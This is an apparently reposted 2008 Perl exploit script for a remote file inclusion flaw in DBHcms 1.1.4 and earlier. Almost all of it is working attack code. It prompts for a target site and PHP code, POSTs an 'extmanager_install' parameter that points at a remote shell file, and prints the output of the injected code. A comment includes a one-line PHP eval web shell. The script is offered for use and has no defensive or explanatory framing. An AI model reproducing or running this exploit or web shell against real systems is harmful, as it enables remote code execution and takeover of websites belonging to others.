DBHcms <= 1.1.4 Remote File Inclusion exploit
来源:http://www.randombase.com 作者:Iron 发布时间:2008-02-26
#!/usr/bin/perl # DBHcms <= 1.1.4 Remote File Inclusion exploit # Vendor url: www.drbenhur.com # # exploit is hard to execute through a browser -possible though- since it's with POST # ~Iron # http://www.randombase.com require LWP::UserAgent; #Shell: # <?php if(!empty($_GET['do'])){eval($_GET['do']);}?> $shell_url = "http://localhost/s.txt";
print "# # DBHcms <= 1.1.4 Remote File Inclusion exploit # By Iron - randombase.com # Greets to everyone at RootShell Security Group # # Example target url: http://www.target.com/dhbcms/ Target url?"; chomp($target=<stdin>); if($target !~ /^http:\/\//) { $target = "http://".$target; } if($target !~ /\/$/) { $target .= "/"; } print "PHP code to evaluate? "; chomp($code=<stdin>); $code =~ s/(<\?php|\?>|<\?)//ig; $target .= "dbhcms/mod/mod.extmanager.php?do=".$code;
$ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy;
$response = $ua->post($target, { 'extmanager_install' => $shell_url.'?' });
if ($response->is_success) { print "\n"."#" x 20 ."\n"; if($response->content =~ /URL file-access/) { print 'Exploit failed'; } else { print $response->content; } print "\n"."#" x 20 ."\n"; } else { die "Error: ".$response->status_line; }
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